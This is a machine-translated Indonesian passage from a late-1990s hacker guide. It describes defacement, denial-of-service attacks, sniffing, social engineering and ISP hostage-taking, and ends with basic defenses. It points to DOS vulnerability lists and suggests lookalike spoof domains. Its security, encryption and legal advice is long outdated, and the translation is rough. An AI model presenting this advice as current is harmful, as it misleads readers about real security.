Tapi mungkin standar saya terlalu tinggi. Nilailah sendiri. Kebijaksanaan orang tua dan obat antinausea
disarankan. Koleksi halaman Web yang diretas dapat ditemukan di
http://www.skeeve.net/
http://www.2600.com/hacked_pages
Namun, bahkan jika seseorang menyebabkan baik dan komentar mereka tajam, mengacaukan situs Web adalah
cara yang menyedihkan untuk menyampaikan pesan. Mereka dengan cepat diperbaiki. Kita harus meretas situs Web yang sangat
terkenal
membuatnya menjadi arsip.
Jika Anda percaya pada kebebasan yang cukup untuk menghormati integritas situs Web orang lain, dan serius tentang hal itu
membuat pernyataan politik di Web, cara legal dan efektif adalah dengan mendapatkan nama domain yang demikian
mirip dengan situs Anda menentang bahwa banyak orang akan pergi ke sana secara tidak sengaja. Misalnya, http://clinton96.org
lucu, bersih, efektif, dan legal. http://dole96.org juga diambil oleh pembuat parodi. Mereka berdua
turun sekarang. Tetapi mereka dilaporkan secara luas. Banyak situs politik yang terhubung dengan mereka!
Untuk mendapatkan nama domain spoof web Anda, kunjungi http://internic.net. Anda akan menghemat banyak uang dengan
membelinya
langsung dari mereka alih-alih melalui perantara. Padahal, yang perlu Anda lakukan hanyalah berjanji untuk membeli domain
nama. Jika Anda bosan dengan situs web parodi Anda sebelum membayar untuk itu, orang-orang mengatakan kepada saya bahwa
mereka baru saja melakukannya
mengembalikan nama itu ke Internic dan tidak ada yang menuntut pembayaran.
************************************************ *********

Halaman 205
Anda bisa dipukul di hidung oleh perusahaan raksasa peringatan: Jika Anda mendapatkan nama domain parodi maka Anda
dapat memasang situs Web yang mengolok-olok korporasi besar, meskipun Anda tidak melanggar hukum, Anda
dapat dituntut. Bahkan jika Anda memenangkan gugatan, Anda dapat menghabiskan banyak uang untuk membela diri. Tapi
kamu mungkin
bisa mendapatkan banyak publisitas yang baik dengan memberi tahu reporter tentang keadaan Anda sebelum menjatuhkan situs
Web Anda. Begitu
pada akhirnya, terutama jika Anda dituntut, Anda dapat membuat pandangan Anda diketahui lebih banyak orang daripada jika
Anda melakukannya
meretas situs Web mereka.
************************************************ *********
Jika Anda ingin menjaga situs web Anda dari serangan, saya sarankan menggunakan perusahaan yang tidak melakukan apa-apa
tetapi host halaman Web. Ini membuatnya lebih mudah untuk menghindari diretas. Ini karena semakin banyak layanan
Penyedia layanan Internet menawarkan, semakin banyak kerentanan yang terbuka. Misalnya, http://techbroker.com saya adalah
di-host oleh kotak Silicon Graphics yang tidak melakukan apa-apa selain menjalankan server Web. Email saya @
techbroker.com, oleh
Sebaliknya, di-host pada mesin yang tidak melakukan apa-apa selain host server POP (post office protocol). Untuk dikirim
keluar email, saya menggunakan komputer lain.
Serangan DOS
Tipe kedua perang hacker adalah serangan denial of service (DOS). Karena mereka merugikan banyak orang selain
target langsung, DOS mungkin merupakan jenis perang hacker yang paling serius.
Spammer adalah target favorit prajurit DOS. Spammer juga, jika sumber saya mengatakan yang sebenarnya, berkelahi
kembali. Senjata pilihan di kedua sisi adalah bom pos.
Baru-baru ini (Juni-Oktober 1997), peretas melakukan perang besar-besaran melawan kerajaan spammer Cyber Promotions, Inc.
dengan penyedia tulang punggung AGIS Internet terperangkap di tengah. Cyberpromo pergi ke pengadilan untuk memaksa AGIS
berikan akses Internet (AGIS akhirnya menang dan menendang Cyberpromo). Tapi sementara itu
serius terluka oleh rentetan vandalisme komputer.
Sementara para pengacau yang menyerang AGIS mungkin berpikir mereka memiliki tujuan yang baik, mereka telah melakukan
lebih banyak
kerusakan daripada perang hacker dalam sejarah, dan merugikan banyak orang dan perusahaan yang tidak bersalah dalam
prosesnya.
Menurut satu sumber pada serangan AGIS, “Orang yang benar-benar melakukannya 'memiliki' semua mesin mereka, milik
mereka
router, dan segala sesuatu yang lain di antaranya. ”Jadi, meskipun serangan terhadap AGIS tampaknya terdiri dari
pembobolan komputer, penggunaan pembobolan itu untuk menolak layanan kepada pengguna AGIS.
************************************************ ******
Catatan pemula: Tulang punggung Internet adalah jaringan komunikasi berkapasitas super tinggi. Ini mungkin termasuk serat
optik dan satelit dan protokol baru seperti Asynchronous Transfer Mode. Pemadaman di tulang punggung
penyedia layanan dapat mempengaruhi jutaan pengguna Internet.
************************************************ ******
************************************************ ******
Anda dapat masuk ke penjara peringatan: Menyerang penyedia tulang punggung Internet adalah cara yang sangat mudah untuk
mendapatkan yang lama,
lama tinggal di penjara.
************************************************ ******
Serangan DOS lainnya termasuk serangan ICMP (Internet Control Message Protocol) yang begitu akrab dengan IRC
prajurit; dan serangkaian serangan yang luar biasa pada sistem Windows NT. http://www.dhp.com/~fyodor/ memiliki a
daftar kerentanan NT DOS yang baik ini, sementara http://showdown.org dari Bronc Buster sangat bagus untuk Unix DOS
serangan. Harap perhatikan: kami menunjukkan ini agar Anda dapat mempelajarinya atau menguji komputer Anda sendiri atau
komputer yang Anda miliki izin untuk menguji.
Sementara Windows NT pada umumnya lebih sulit bagi penjahat untuk menerobos, pada umumnya jauh lebih mudah untuk
dilakukan
Serangan DOS terhadap mereka.

Halaman 206
************************************************ ******
Anda bisa masuk penjara, dipecat dan / atau dipukul peringatan hidung: serangan DOS secara umum menyedihkan
mudah diluncurkan tetapi dalam beberapa kasus sulit dipertahankan. Jadi tidak hanya satu yang bisa mendapatkan segala macam
masalah untuk
Serangan DOS - orang-orang juga akan menertawakan mereka yang terperangkap. “Code kiddie! Lamer! "
************************************************ ******
Mengendus
Sniffing adalah mengamati aktivitas korban seseorang di jaringan (biasanya Internet). Ini bisa termasuk
mengambil kata sandi, membaca email, dan mengamati sesi telnet.
Program sniffer hanya dapat diinstal jika ada root di komputer itu. Tapi itu tidak cukup untuk memastikan itu
komputer host Internet Anda bebas dari sniffer. Email Anda, telnet, ftp, penjelajahan web - dan kata sandi apa pun
Anda dapat menggunakan - dapat melewati 20 atau lebih komputer dalam perjalanan ke tujuan akhir. Itu banyak sekali
tempat-tempat di mana sniffer mungkin dipasang. Jika Anda benar-benar serius tidak ingin menonton cybernazi
semua yang Anda lakukan online, ada beberapa solusi.
Program Eudora Pro akan memungkinkan Anda menggunakan protokol APOP untuk melindungi kata sandi saat Anda
unduh email. Namun, ini tidak akan melindungi email itu sendiri dari pengintai.
Jika Anda memiliki akun shell, Secure Shell (ssh) dari Datafellows akan mengenkripsi semua yang lewat
antara komputer rumah dan akun shell Anda. Anda juga dapat mengatur terowongan terenkripsi dari satu
komputer tempat Anda memiliki akun shell ke akun shell kedua di komputer lain - jika keduanya sama
menjalankan Secure Shell.
Anda dapat mengunduh program server ssh gratis untuk Unix di
ftp://sunsite.unc.edu/pub/packages/security/ssh/ssh-1.2.20.tar.gz, atau periksa
http://www.cs.hut.fi/ssh/#ftp-sites.
Jika Anda seorang sysadmin atau pemilik ISP, dapatkan ssh sekarang! Dalam beberapa tahun, semua ISP yang memiliki petunjuk
akan
membutuhkan login ssh ke akun shell.
Untuk versi klien yang akan berjalan di Windows, Mac atau versi komputer Unix apa pun, lihat
Situs DataFellows di http://www.datafellows.com/. Tapi ingat, akun shell Anda harus menjalankan ssh
program server agar klien ssh Windows Anda bekerja.
Untuk masuk ke daftar diskusi ssh, email majordomo@clinet.fi dengan pesan "berlangganan ssh."
Tapi ssh, seperti APOP tidak akan melindungi email Anda. Solusinya? Enkripsi. PGP populer dan bisa
dibeli di http://pgp.com. Saya sarankan menggunakan opsi RSA. Ini adalah algoritma yang lebih kuat daripada standarnya
Diffie-Hellman ditawarkan oleh PGP.
************************************************ **********
Catatan pemula: Enkripsi sedang mengacak pesan sehingga sangat sulit bagi siapa pun untuk menguraikannya
kecuali mereka memiliki kunci yang tepat, dalam hal ini menjadi mudah diacak.
************************************************ **********
************************************************ **********
Kiat jenius jahat: Meskipun algoritme RSA adalah yang paling dikenal, program enkripsi dapat mengimplementasikannya
cara yang tidak aman. Yang terburuk dari semuanya, RSA tergantung pada hipotesis matematika yang tidak dapat dibuktikan
tidak ada algoritma terikat waktu polinomial untuk nomor anjak. Itu alasan yang bagus untuk mengikuti matematika
berita!
Elemen plot utama dari film "Sepatu" adalah penemuan fiktif dari algoritma cepat menjadi faktor
angka. Way to go, penulis / produser Sneakers Larry Lasker!

Halaman 207
************************************************ **********
************************************************ **********
Anda dapat masuk ke penjara peringatan: Di banyak negara ada pembatasan hukum pada enkripsi. Di AS, yang
Peraturan Lalu Lintas Internasional dalam Senjata melarang ekspor perangkat lunak enkripsi apa pun yang cukup baik
layak digunakan. Jika kita serius tentang kebebasan berbicara, kita harus menemukan cara untuk menjaga komunikasi kita
pribadi. Jadi melawan kontrol pada enkripsi adalah bagian kunci dari memenangkan pertempuran melawan penindasan di Internet
Internet.
************************************************ **********
Rekayasa Sosial
Seperti yang kita lihat di GTMHH tentang cara masuk ke komputer, rekayasa sosial biasanya terdiri dari menceritakan
kebohongan yang dipikirkan dengan buruk. Tetapi seorang insinyur sosial yang terampil dapat meyakinkan Anda bahwa ia
melakukannya
Anda bantuan besar saat membuat Anda memberikan toko. Seorang insinyur sosial yang sangat terampil bisa mendapatkan
hampir semua
informasi dari Anda bahkan tanpa berbohong.
Misalnya, seorang peretas memposting nomor telepon rumahnya di papan buletin sebuah perusahaan besar
karyawan untuk memanggilnya untuk dukungan teknis. Dia memberikan dukungan teknis yang luar biasa. Sebagai gantinya, dia
mendapat banyak
kata sandi. Jika dia cerdas, dia akan mendapatkan pekerjaan dukungan teknis yang nyata, tetapi kemudian saya tidak pernah bisa
membayangkannya
keluar beberapa tipe haxor ini.
Pengambilan Hostage ISP
Cara favorit penyerang dalam perang peretas adalah menyerang akun Internet korban. Kemudian mereka
terompet di sekitar tentang bagaimana ini membuktikan bahwa korban adalah seorang lamer.
Tetapi tidak ada dari kita yang bertanggung jawab untuk mengelola keamanan di ISP yang kita gunakan. Tentu saja, Anda bisa
mendapatkan
nama domain, pasang komputer dengan banyak keamanan dan kaitkan langsung ke penyedia tulang punggung Internet
dengan koneksi telepon 24 jam. Kemudian, setelah memeriksa akun, Anda dapat mengambil tanggung jawab untuk akun Anda
host internet sendiri. Tapi seperti yang kita pelajari dari serangan AGIS, bahkan tulang punggung Internet bisa diturunkan.
Jika Anda menunjukkan ini, bahwa Anda bukan orang yang menjalankan keamanan pada ISP yang Anda gunakan, peretas pria
jahat akan melakukannya
menghina Anda dengan mengklaim bahwa jika Anda benar-benar tahu sesuatu, Anda akan mendapatkan ISP "aman". Ya benar.
Ini dia
mengapa selalu mudah untuk membobol akun Anda di ISP, dan hampir tidak mungkin disimpan oleh ISP Anda
peretas keluar.
Meskipun sulit untuk menembus hampir semua sistem komputer dari luar, ada banyak eksploitasi
yang akan membuat Anda superuser (root) kontrol dari dalam akun shell. Jadi yang perlu dilakukan penyerang Anda adalah
membeli
akun, atau bahkan menggunakan akun uji coba waktu terbatas yang ditawarkan banyak ISP, dan penjahatnya siap berjalan
merajalela.
Anda dapat meningkatkan keamanan Anda dengan menggunakan ISP yang hanya menawarkan akun PPP (point to point). Ini satu
alasannya semakin sulit untuk mendapatkan akun shell. Terima kasih, cybernazis, karena merusak Internet untuk Internet
kita semua.
Tetapi bahkan ISP yang hanya menawarkan akun PPP lebih rentan daripada sistem komputer biasa
temukan di perusahaan besar, karena alasan sederhana yang diperlukan ISP Anda agar mudah digunakan.
************************************************ ******
Catatan pemula: Akun shell memungkinkan Anda memberikan perintah Unix ke komputer tempat Anda berada. Akun PPP
adalah
digunakan untuk melihat gambar-gambar cantik saat Anda menjelajahi Web tetapi dengan sendirinya tidak akan membiarkan
Anda memberikan perintah Unix ke
komputer tempat Anda masuk.
************************************************ ******

Halaman 208
Karena mudah untuk masuk ke hampir semua ISP, cybernaz haxor d00d berpikir itu adalah kewl untuk mengambil sandera ISP
dengan berulang kali menerobos masuk dan merusaknya sampai pemiliknya menyerah dengan menendang korban serangan
mati. Ini adalah tujuan serangan di Succeed.net pada Oktober 1997.
************************************************ *****
Anda dapat masuk ke penjara peringatan: Saya biasanya mengubur nama ISP dalam panduan ini karena begitu banyak tipe haxor
menyerang sistem komputer yang saya tulis. Succeed.net adalah nama asli. Jika Anda ingin menyerangnya, baiklah. Hanya
ingatlah bahwa kami telah menjebak para penjahat itu. Jadi, jika Anda menyerang, pria berjas membawa kartu Miranda
akan membayar Anda berkunjung.
************************************************ *****
Mengapa Saya Harus Memberikan Darn? - Cara Bystanders Get Hurt
Bagi kebanyakan orang, perang hacker adalah hal-hal Legion of Doom vs Masters of Deception. Menarik, tapi suka
membaca fiksi ilmiah. Tapi apa hubungannya dengan hidup Anda? Anda dapat membayangkannya jika tidak pernah
melakukannya
apa pun yang membuat beberapa dweeb komputer yang berpikir dia gila, Anda tidak akan punya masalah.
Namun kemungkinannya adalah bahwa Anda mungkin telah disapu oleh perang hacker. Pernahkah Anda mencoba masuk?
penyedia online Anda dan tidak dapat membuat koneksi? Apakah Anda memanggil dukungan teknis dan mereka memberi tahu
Anda
"tidak ada perawatan"? Mencoba mengirim email dan mendapat pesan “tidak dapat mengirim email sekarang. Silakan dicoba
nanti lagi"? Email terkirim yang menghilang ke dunia maya tanpa jejak? Dapatkan email kembali dengan "Pengguna
tidak diketahui "atau lebih buruk lagi, pesan" host tidak dikenal "? Belum dapat menjelajahi situs Web favorit Anda?
Bisa jadi itu kesalahan teknis (batuk, batuk). Tapi mungkin lebih. Aturan utama online
layanan tidak pernah mengakui di depan umum bahwa sedang diretas. Hanya jika seorang reporter "mengeluarkan" mereka
terlebih dahulu mereka akan melakukannya
dengan enggan mengakui serangan itu. Ini karena ada geng cybernazi itu, ketika mereka mendengar online
layanan diserang, bergabung dalam serangan itu.
Mengapa cybernazis melakukan ini tidak jelas. Namun, apa yang mereka capai adalah menyulitkan perusahaan kecil
untuk bersaing dengan raksasa seperti America Online. Layanan online raksasa mampu membayar banyak staf
ahli keamanan komputer. Jadi dengan cybernazis mengamuk melawan penyedia layanan Internet kecil, itu
tidak mengherankan bahwa begitu banyak dari mereka menjual kepada para raksasa.
Saya tidak punya bukti bahwa para cybernazis membayar para raksasa seperti AOL. Bahkan, saya curiga
cybernazis berusaha mengusir para pesaing kecil keluar dari bisnis semata-mata dengan prinsip umum bahwa mereka
benci kebebasan apa pun.
Adalah umum untuk perang hacker yang dimulai sebagai perselisihan pribadi untuk meluas dan mempengaruhi ribuan atau
bahkan
jutaan pengamat.
Sebagai contoh, pada bulan September 1996, penyerang banjir syn mematikan Panix ISP selama beberapa hari. Pada Oktober
1997 itu
ISP Succeed.net ditutup oleh tim peretas yang menghapus tidak hanya Bronc tetapi juga lebih dari 800 pengguna
akun. Banyak ISP lain menderita shutdowns dari perang hacker, sering karena objek penyerang
untuk pandangan politik yang diungkapkan di halaman Web mereka.
Pada tanggal 4 Juni 1997, perang hacker membuat lompatan kuantum lain, mematikan layanan tulang punggung Internet
penyedia AGIS sebagai pembalasan untuk itu memungkinkan Cyberpromo dan beberapa kerajaan spam lainnya menjadi
pelanggan.
Besok pertempuran kecil ini dapat mengadu domba bangsa dengan bangsa: jaringan listrik yang melayani ratusan juta
gagal di tengah musim dingin; sistem kontrol lalu lintas udara serba salah dengan pesawat yang jatuh; ratusan
miliaran, triliunan dolar dalam sistem perbankan menghilang tanpa jejak. Pearl Harbor. Mutiara Digital
Pelabuhan. Kelaparan. Bertahun-tahun sebelumnya kita dapat keluar dari keruntuhan ekonomi yang sama buruknya dengan
Depresi Hebat.

Halaman 209
Anda pikir ini berlebihan berlebihan? Mereka yang digunakan yang telah di bullseye of the
cybernaz menemukan masa depan ini mudah dipercaya.
Winn Schwartau telah memperingatkan dunia tentang bencana yang akan datang ini sejak Juni 1991. Pasti ada seseorang
mendengarkan, karena pada bulan September 1997 sebuah kelompok industri, terbentuk setelah sidang oleh Senat AS
Subkomite Permanen Investigasi, ditunjuk sebagai pemimpin tim Schwartau, Proyek Cyber Manhattan
Warfare Informasi / Pertahanan Sipil Elektronik (lihat http://www.warroomresearch.com/mcp/ dan
http://www.infowar.com).
Schwartau, dalam bukunya Information Warfare, memberi tahu kita tentang beberapa serangan yang dilakukan para cybernazis
keluarganya. Serangan-serangan ini termasuk penipuan kartu kredit besar-besaran, merusak peringkat kreditnya, berbalik
off daya dan telepon rumahnya, dan bahkan merusak sistem pengiriman layanan darurat lokal begitu
bahwa semua panggilan ambulan, pemadam kebakaran, dan polisi diarahkan ke rumahnya alih-alih untuk mereka yang
memanggil 911
bantuan darurat.
Kami di garis depan cyberwar telah menyaksikan serangan ini secara langsung. Si cybernazis, seperti Schwartau
ditemukan, bersedia bahkan mempertaruhkan nyawa orang-orang yang tidak ada hubungannya dengan dia.
Ya, kami tahu perang peretas lakukan pada kami, dan kami tahu apa pengaruhnya terhadap Anda.
Mengapa Anda Dapat Mendapatkan Hit
Perang peretas terjadi pada orang lain, bukan? Spammer diretas. Geng peretas saling berkelahi.
Tetapi jika Anda berperilaku sopan di penjahat komputer, Anda aman, kan? Oke, selama Anda tidak tinggal
lingkungan salah satu dari kami pejuang kebebasan Internet seperti Schwartau atau saya, Anda aman.
Salah. Sangat salah.
Mari kita lihat contoh perang hacker, yang tampaknya tidak memiliki motivasi sama sekali. Sedang berbicara
Klub Catur Internet. Tidak terlalu kontroversial.
Pada pertengahan September 1996 ditutup oleh serangan banjir sin setelah daemon9 menerbitkan sebuah program
untuk mengimplementasikan serangan di ezine Phrack.
Ada banyak pengamat mendapat untung dengan perang melawan daftar Happy Hacker ini. Semuanya dimulai dengan
cybernazis yang ingin menghentikan Anda mendapatkan email dari saya. Misalnya, pada 6 Desember 1996, seseorang
memilikinya
ditulis ke daftar email peretas dc-stuff (berlangganan dengan mengirim email ke majordomo@dis.org dengan pesan
"berlangganan dc-stuff) dengan mengatakan" Saya pikir mereka (atau mungkin 'kita') akan selamat, buku Carolyn. "Rogue Agent
menjawab:
Saya hanya melakukan bagian saya untuk memastikan itu tidak terjadi. Tanyakan apa yang bisa dilakukan jaringan untuk Anda,
tanyakan
apa yang dapat Anda lakukan untuk jaringan. Kami akan melawan mereka di router, kami akan melawan mereka di serat, kami
akan melakukannya
lawan mereka di vaxen ... Saya seorang aktivis, dan saya tidak akan menghentikan isme aktivasi saya hanya karena saya tahu
orang lain akan mengambilnya
terlalu jauh.
Pada tanggal 20 Desember Agen Nakal menulis kepada saya:
Tanyakan Netta Gilboa; majalahnya berantakan dan pacarnya di penjara, sementara dia hidup dalam ketakutan. Tanya Josh
Quittner (penulis Masters of Deception); untuk sementara di sana, dia harus mengubah nomor teleponnya (tidak terdaftar)
secara harfiah setiap dua minggu karena panggilan anonim malam dia dapatkan. Entah bagaimana mereka selalu
mendapatkannya
nomor baru. Tanyakan John Markoff (penulis pendamping dari peredaran terlaris peretas); dia bahkan tidak bisa membiarkan
orang
tahu apa itu akun surelnya atau dia akan spam pada hari berikutnya.
Ini bukan ancaman ... Yang saya lakukan adalah memberi tahu Anda apa yang akan terjadi ... Anda bermain api. Ada yang lebih
gelap
elemen dalam budaya saya, dan Anda akan bertemu jika Anda terus berjalan.

Halaman 210
"Ini bukan ancaman." Ya, benar. Itulah yang dikatakan sebagian besar orang yang mengancam kita.
Lima hari kemudian, ketika hari masih gelap di pagi Natal, pemilik ISP Cyberport Barat Daya
di mana saya memiliki akun dibangunkan oleh alarm. Server suratnya rusak. Tidak ada yang menggunakan ISP itu
email lagi. Mereka telah dihantam oleh mailbombing besar-besaran oleh seseorang yang menyebut dirinya johnny xchaotic.
jericho muncul sebagai juru bicara publik untuk penyerang, mengklaim pengetahuan intim tentang teknik dan
motivasi.
Malam tanggal 28 Desember, seseorang memecahkan kotak khusus yang digunakan Cibola Communications
memberikan kami tanpa biaya untuk menjalankan majordomo Happy Hacker. Penyusup itu menghapus file sistem dan mengirim
email ke pemilik yang mengancam kekacauan yang lebih buruk jika mereka tidak menyerah dan mem-boot kita. Para penyerang
juga
menghapus file sistem dari komputer di University of Texas di El Paso yang saya gunakan untuk penelitian,
dan mengirim ancaman ke semua alamat email di kotak itu. Penyerang memanggilnya elf GALF. Itu bukan yang pertama atau
Terakhir kali GALF menyerang Happy Hacker.
Komputer yang rusak, ancaman, pemerasan, pemerasan. Itu kehidupan di sekitar sini. Setelah beberapa saat menjadi agak
membosankan,
menguap - hanya bercanda.
************************************************ *******
Catatan pemula: Jika Anda bertanya-tanya apakah Anda bisa terbunuh dalam salah satu pertempuran ini, saya belum
menemukannya
melaporkan, bahkan bukan rumor, tentang pembunuhan perang hacker. Orang-orang ini hanya membunuh orang secara kebetulan
saja
efek kekacauan digital mereka. Seperti mengirim ambulans yang bisa menyelamatkan anak yang sekarat ke rumah seorang
Pejuang kebebasan internet sebagai gantinya. Namun, jika seseorang mengancam akan membunuh Anda, Anda harus
melaporkannya dan
setiap serangan komputer terkait. Terlepas dari apa yang mungkin Anda dengar, kami para peretas yang bukan komputer
penjahat bekerja sama dengan antusias dengan penegak hukum.
************************************************ *******
Cara Masuk ke Perang Peretas
“Aku ingin bertarung dalam perang hacker. Bagaimana saya bisa masuk? "
Saya mendapat email seperti ini setiap saat. Banyak peretas pemula merindukan pengalaman saya yang sering diserang
sekelompok penjahat komputer yang berbakat. Kegembiraan! Kesempatan untuk pergi mano a mano dengan dudes buruk
dan buktikan bahwa Anda lebih baik dari mereka!
Ada beberapa kebenaran dalam pandangan ini. Sejujurnya, saya mendapatkan sensasi melawan para penjahat - menggunakan
taktik hukum, dari
tentu saja Percayalah, jika kami menangkap penyerang Succeed.net, Anda akan mendengarnya. Tetapi sebelum Anda membuat
keputusan untuk bergabung dengan kami pejuang kemerdekaan, menghitung biayanya. Itu tidak selalu menyenangkan.
Tapi aku sudah melawan mereka. Dan, tembak, aku hanya seorang wanita tua. Jadi jika Anda ingin menarik perang hacker, dan
percaya Anda sama tangguh atau lebih tangguh dari saya, jadilah tamu saya. Tetapi sebelum Anda mulai memancing serangan,
silakan
tunggu saya untuk keluar dua bagian selanjutnya dari seri Informasi Warfare ini, sehingga Anda dapat belajar cara
memperbaikinya
peringkat kredit Anda dan pulih dari bencana digital lainnya. Anda akan menemukan banyak hal di Panduan berikutnya di
seri ini yang akan membantu Anda bertahan bahkan perang hacker yang paling ditentukan. Bahkan jenis perangnya itu
mencoba mencuri semua milik Anda, menghapus identitas Anda, dan mengancam kehidupan keluarga Anda.
Jadi bagaimana Anda memasuki perang hacker? Cara termudah adalah menghadiri konvensi peretas. Ada semuanya
semacam orang bengkok pada hal-hal ini, seperti adegan bar di Star Wars. "Dia bilang, dia tidak suka
cara Anda melihat.
kebebasan berbicara, atau bahkan lebih buruk lagi, mengolok-olok mereka karena menjadi cybernazis, Anda dapat menikmati
banyak hal
kegembiraan.

Halaman 211
Cara Menjaga agar Tidak Tertangkap - TIDAK!
Jadi Anda ingin menjadi penyerang dalam perang hacker? Jadi Anda pikir Anda bisa menjaga agar tidak ketahuan? Menurut
untuk jericho, menulis dalam bukunya "F *** ed Up College Kids", "Anda memiliki pelacur media seperti Carolyn Meinel
mencoba mengajari orang-orang untuk meretas, menulis panduan untuk meretas penuh dengan kesalahan. Memberitahu orang-
orang ini apa yang harus dilakukan,
tetapi tidak memberi mereka informasi yang cukup untuk melindungi diri mereka sendiri secara memadai. "
Saya setuju dengan jericho, jika Anda memutuskan untuk menjadi penjahat komputer dalam perang hacker, saya tidak cukup
berbakat untuk melakukannya
mengajari Anda cara agar tidak tertangkap.
Bahkan, tidak ada yang bisa mengajari Anda cara agar tidak tertangkap. Saya akan memberi tahu Anda alasannya juga.
Di panel Def Con V yang saya selenggarakan (Las Vegas, Juli 1997), jericho membual, “Ketika saya masuk, saya menutup pintu
di belakangku. ”Dia membuat masalah besar tentang bagaimana peretas dapat terhindar dari tertangkap dengan menghapus atau
memodifikasi
file log. Ya. Kanan. Tidak!
Biarkan saya menceritakan kisah NYATA tentang apa yang terjadi ketika peretas berpikir mereka menutupi jejak mereka. Yakin,
sysadmin biasa tidak dapat mengembalikan file yang dihapus pada sistem Unix. Tetapi ada orang di luar sana dengan
teknologi untuk mengembalikan file yang dihapus - bahkan file yang telah ditimpa ratusan kali. Mereka bisa
mengembalikannya terlepas dari sistem operasi. Ada orang di luar sana yang dapat mengekstraksi segala yang dimiliki
berada di hard disk selama beberapa bulan terakhir - atau bertahun-tahun. Saya kenal orang-orang itu. Saya mengatur agar
mereka membaca
hard disk tersebut. Tebak siapa yang bersulang :) :) :)
Lalu ada pengawasan. Beberapa 31337 haxor sedang duduk di kotaknya menimbulkan neraka dan "menutup pintu setelahnya."
Yang tidak dia ketahui adalah bahwa berkat perintah pengadilan yang diilhami oleh teman-temannya, seseorang duduk di sebuah
van
seratus meter jauhnya - mengambil setiap keystroke. Radiasi Van Eck, luser. Atau mengambil sinyal itu
jalankan kabel daya komputer Anda. Pernah mendengar tentang Tempest?
Bahkan jika detektif kejahatan dunia maya tidak memiliki semua perangkat keras berteknologi tinggi ini, sejarah peretas
Kejahatan menunjukkan bahwa penjahat akan berbicara dengan imbalan hukuman yang ringan. Komit satu federal yang mudah
dibuktikan
kejahatan, katakanlah memposting email yang dicuri seseorang di server ftp publik seseorang (siapa yang kita tahu yang telah
melakukan
ini?), dan FBI memiliki banyak daya tawar terhadapnya.
Jadi, bahkan jika saya ingin membantu orang menjadi penjahat, saya tidak bisa. Bukan karena saya tidak tahu caranya. Karena
tidak ada jalan. 31337 d00dz yang memberi tahu Anda sebaliknya benar-benar bodoh.
Saya memprediksi penyerang Succeed.net akan berakhir di penjara. Segera. Mungkin bukan karena kejahatan itu. Tapi hari-hari
mereka
kebebasan diberi nomor. Ini hanya masalah memilih mana dari banyak kejahatan mereka akan bertahan di pengadilan,
dan siapa yang akan memberikan bukti terhadap siapa. Saatnya mempelajari teori permainan - dapatkah Anda mengatakan
"dilema tahanan,"
wannabe ubercriminals? Siapa narc-nya?
"Tapi, tapi," aku bisa mendengar penjahat komputer Super Duper tergagap. “Teman-teman saya dan saya melanggar hukum
semua
waktu dan kita tidak pernah tertangkap. Oke, oke, teman saya yang lain ketahuan, tapi dia lumpuh. ”
Itu hanya masalah waktu. Mereka harus langsung sebelum jumlah mereka naik. Atau membuat keputusan untuk mendapatkannya
kartu “keluar dari penjara gratis” mereka dengan memberi tahu geng mereka sebelum hari malapetaka mereka muncul. Mereka
punya
daya tawar yang jauh lebih baik jika mereka membuat kesepakatan sebelum ditangkap.
************************************************ ******
Jika Anda kebetulan seorang cybernazi yang memiliki pemikiran kedua, dan ingin membantu membuat kesepakatan dengan
otoritas, silakan hubungi saya secara anonim menggunakan kunci pgp saya:
----- BEGIN PGP PUBLIC KEY BLOCK -----
Versi: PGP untuk Privasi Pribadi 5.0

Halaman 212
mQENAzRWYacAAEIALYjWhzd8qO / MteFrb2p9SsY5GHdFAxT7R1M4X / jt5Nd / VKR
qCJoS4F / kQ6NwsM / mopjd4yVunxvs4QUK7eZ5A2rZuEps4EadXwwBPI63RfHci5o
BiXs9fGYtpTx7bv9dJE / Z9tved8s24asib06vLDqzyCFDXrRoYLO8PwEmifwWVWW
OL + 5Th45m6cirXuwi1Idjy66AZwt8ARFnns5FA5OCb82NW54RsFKbKR2u2wUfT72
rRJg0ICt / WtZdr2dBccXEgp1232s5rgwiRvqmGjMOruUDfU2nNHH3pOk8JrefIXl
dwV0yjErb7wcecCFIrHfQKcxVoNXHlgJ6afePjcABRG0J0Nhcm9seW4gTWVpbmVs
IDxjbWVpbmVsQHRlY2hicm9rZXIuY29tPokBFQMFEDRWYaceWAnpp94 + NwEB9bsH
/ ilWgT2ix3B79UFfrjSE9EYCjKh1CWiIGMohdjjmV8Q3lSJIoikPtUZNak4lBTh /
wuD5ea0DZuoDe6i4EagBmRgTCvATXQqD74XtNSZSPhIQMOytJUJLlmuAnDEm96XS
30xguSFrXNjHYS19prE1yi2vQe / PJ7 / K1QQwy725hjI5fnq4TnldxloaESNvurKh
Mc3GwQWF1JmpaFup3 + hrEwUxcQ2PJn3xkgcjKkj1x7emDIGLCgF1RIJDLM63Q5Ju
bCqodumjX0pe8kHL3tRaDux + eAZ4ZD73HvF4lYi7QLKGDwX1Vv9fmbJH4tCqo3pq
RBhG32XmkTuDe0EExdSET + w =
= 09hD
----- END PGP PUBLIC KEY BLOCK -----
************************************************ **********
Cara Melindungi diri Anda dari Perang Peretas
Apa, Anda tidak menemukan terjebak dalam perang hacker yang sangat menghibur? Anda tidak ingin menjadi
pengamat yang tidak bersalah terjebak dalam baku tembak perintah rm? Berikut adalah beberapa aturan yang dapat membantu
Anda. Tapi
ingat, ini hanya perlindungan paling dasar. Kami akan membahas teknik kekuatan industri di
Panduan selanjutnya dalam seri ini, serta cara menangkap pelakunya.
Sepuluh Pertahanan Pemula Teratas dalam Perang Hacker
10) Cadangan, cadangan, cadangan.
9) Asumsikan ada sesuatu yang diendus, kecuali dilindungi oleh enkripsi yang kuat.
8) Asumsikan telepon Anda diketuk.
7) Tidak pernah, tidak pernah, pernah telnet ke akun shell Anda. Gunakan Secure Shell sebagai gantinya.
6) Pilih kata sandi yang baik. Itu harus panjang, bukan nama atau kata dari kamus, dan harus termasuk
angka dan / atau karakter seperti! @ # $% ^ & *. Jika Anda menggunakan komputer tempat orang lain memiliki akses fisik
itu, jangan tulis kata sandi Anda pada apa pun.
5) Ini berlaku untuk akun shell: anggap penyerang Anda akan mendapatkan kontrol root, jadi kata sandi Anda
tidak akan ada gunanya bagimu. Itu berarti Anda harus mengenkripsi file yang tidak ingin Anda sampaikan,
dan kirim file histori shell Anda ke / dev / null setiap kali Anda logout.
4) Apakah Anda menggunakan program email Pine atau Elm? Jangan simpan alamat email di akun shell Anda. Anda
file email yang disimpan adalah tempat yang baik bagi cybernazis untuk menemukan alamat email dan mengirimkan ancaman
dan
pesan cabul untuk mereka. GALF berspesialisasi dalam taktik ini.
